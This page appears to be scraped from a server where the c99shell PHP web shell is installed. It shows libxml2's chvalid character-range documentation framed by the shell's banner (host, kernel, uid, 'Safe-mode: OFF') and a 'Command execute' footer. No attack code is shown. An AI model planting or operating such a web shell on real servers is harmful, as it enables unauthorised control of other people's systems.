Software: Apache. PHP/7.3.33 uname -a: Linux web25.us.cloudlogin.co 5.10.237-xeon-hst #1 SMP Mon May 5 15:10:04 UTC 2025 x86_64 uid=233359(alpastrology) gid=888(tty) groups=888(tty),33(tape) Safe-mode: OFF (not secure) /usr/share/gtk-doc/html/libxml2/ drwxr-xr-x |
Viewing file: Select action/file-type:
chvalidchvalid - Unicode character range checking this module exports interfaces for the character range validation APIs This file is automatically generated from the cvs source definition files using the genChRanges.py Python script Author(s): William Brack <wbrack@mmm.com.hk> Synopsis#define xmlIsExtender_ch(c); #define xmlIsPubidCharQ(c); #define xmlIsPubidChar_ch(c); #define xmlIsIdeographicQ(c); #define xmlIsExtenderQ(c); #define xmlIsChar_ch(c); #define xmlIsDigitQ(c); #define xmlIsDigit_ch(c); #define xmlIsBaseChar_ch(c); #define xmlIsCombiningQ(c); #define xmlIsBlankQ(c); #define xmlIsCharQ(c); #define xmlIsBaseCharQ(c); #define xmlIsBlank_ch(c); typedef struct _xmlChLRange xmlChLRange; typedef xmlChSRange * xmlChSRangePtr; typedef xmlChLRange * xmlChLRangePtr; typedef xmlChRangeGroup * xmlChRangeGroupPtr; typedef struct _xmlChSRange xmlChSRange; typedef struct _xmlChRangeGroup xmlChRangeGroup; int xmlIsChar (unsigned int ch); int xmlIsDigit (unsigned int ch); int xmlIsBlank (unsigned int ch); int xmlIsIdeographic (unsigned int ch); int xmlCharInRange (unsigned int val, DescriptionDetailsMacro xmlIsBaseCharQ#define xmlIsBaseCharQ(c); Automatically generated by genChRanges.py
Macro xmlIsBaseChar_ch#define xmlIsBaseChar_ch(c); Automatically generated by genChRanges.py
Macro xmlIsBlankQ#define xmlIsBlankQ(c); Automatically generated by genChRanges.py
Macro xmlIsBlank_ch#define xmlIsBlank_ch(c); Automatically generated by genChRanges.py
Macro xmlIsChar_ch#define xmlIsChar_ch(c); Automatically generated by genChRanges.py
Macro xmlIsCombiningQ#define xmlIsCombiningQ(c); Automatically generated by genChRanges.py
Macro xmlIsDigitQ#define xmlIsDigitQ(c); Automatically generated by genChRanges.py
Macro xmlIsDigit_ch#define xmlIsDigit_ch(c); Automatically generated by genChRanges.py
Macro xmlIsExtenderQ#define xmlIsExtenderQ(c); Automatically generated by genChRanges.py
Macro xmlIsExtender_ch#define xmlIsExtender_ch(c); Automatically generated by genChRanges.py
Macro xmlIsIdeographicQ#define xmlIsIdeographicQ(c); Automatically generated by genChRanges.py
Macro xmlIsPubidCharQ#define xmlIsPubidCharQ(c); Automatically generated by genChRanges.py
Macro xmlIsPubidChar_ch#define xmlIsPubidChar_ch(c); Automatically generated by genChRanges.py
Structure xmlChLRangestruct _xmlChLRange { unsigned int low unsigned int high } xmlChLRange; Typedef xmlChLRangePtrxmlChLRange * xmlChLRangePtr; Structure xmlChRangeGroupstruct _xmlChRangeGroup { int nbShortRange int nbLongRange const xmlChSRange * shortRange : points to an array of ranges const xmlChLRange * longRange } xmlChRangeGroup; Typedef xmlChRangeGroupPtrxmlChRangeGroup * xmlChRangeGroupPtr; Structure xmlChSRangestruct _xmlChSRange { unsigned short low unsigned short high } xmlChSRange; Typedef xmlChSRangePtrxmlChSRange * xmlChSRangePtr; Variable xmlIsBaseCharGroupconst xmlChRangeGroup xmlIsBaseCharGroup; Variable xmlIsCharGroupconst xmlChRangeGroup xmlIsCharGroup; Variable xmlIsCombiningGroupconst xmlChRangeGroup xmlIsCombiningGroup; Variable xmlIsDigitGroupconst xmlChRangeGroup xmlIsDigitGroup; Variable xmlIsExtenderGroupconst xmlChRangeGroup xmlIsExtenderGroup; Variable xmlIsIdeographicGroupconst xmlChRangeGroup xmlIsIdeographicGroup; Variable xmlIsPubidChar_tabconst unsigned charxmlIsPubidChar_tab[256] xmlIsPubidChar_tab; xmlCharInRange ()int xmlCharInRange (unsigned int val, Does a binary search of the range table to determine if char is valid
xmlIsBaseChar ()int xmlIsBaseChar (unsigned int ch) This function is DEPRECATED. Use xmlIsBaseChar_ch or xmlIsBaseCharQ instead
xmlIsBlank ()int xmlIsBlank (unsigned int ch) This function is DEPRECATED. Use xmlIsBlank_ch or xmlIsBlankQ instead
xmlIsChar ()int xmlIsChar (unsigned int ch) This function is DEPRECATED. Use xmlIsChar_ch or xmlIsCharQ instead
xmlIsCombining ()int xmlIsCombining (unsigned int ch) This function is DEPRECATED. Use xmlIsCombiningQ instead
xmlIsDigit ()int xmlIsDigit (unsigned int ch) This function is DEPRECATED. Use xmlIsDigit_ch or xmlIsDigitQ instead
xmlIsExtender ()int xmlIsExtender (unsigned int ch) This function is DEPRECATED. Use xmlIsExtender_ch or xmlIsExtenderQ instead
xmlIsIdeographic ()int xmlIsIdeographic (unsigned int ch) This function is DEPRECATED. Use xmlIsIdeographicQ instead
xmlIsPubidChar ()int xmlIsPubidChar (unsigned int ch) This function is DEPRECATED. Use xmlIsPubidChar_ch or xmlIsPubidCharQ instead
|
:: Command execute :: | |
--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0125 ]-- |